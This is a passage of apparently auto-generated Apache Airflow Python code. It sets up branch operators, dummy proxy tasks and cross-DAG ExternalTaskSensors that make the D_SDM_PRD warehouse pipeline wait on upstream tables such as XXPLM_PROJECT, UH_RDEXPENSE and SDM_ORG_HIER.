external_dag_id="D_SDM_FIN",
external_task_id="SDM_MANUFACTURING_PLANT",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT)
BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT)
D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE","D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE","D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE"
D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="Z_CDOCUMENT_CHECKING_RULE",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE)
D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT"
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="XXPLM_PROJECT",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT)
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS","D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS","D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS"
D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="NSP_REQ_HEADERS",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS)
D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_PCS_HEADER_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_PCS_LINEEE_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_PCS_LINEER_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW","D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW"
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="EFLOW_BTMS_EXPENSEPROJECT_TW",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW)
D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW)
def branch_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_HRM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE","D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE","D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"]
return ["proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"
BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"
proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE"
D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_HRM",
external_task_id="UH_RDEXPENSE",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE)
BRANCH_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE)
D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE)
def branch_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_MFG_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP","D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP","D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"]
return ["proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"
BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"
proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP"
D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_MFG_SRC",
external_task_id="XXWIP_STOREIN_USAGE_TEMP",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP)
BRANCH_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP)
D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP)
def branch_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER","D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER","D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"]
return ["proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"]
my_taskid = "BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"
BRANCH_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"
proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER"
D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_SDM_SCM",
external_task_id="SDM_ORG_HIER",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
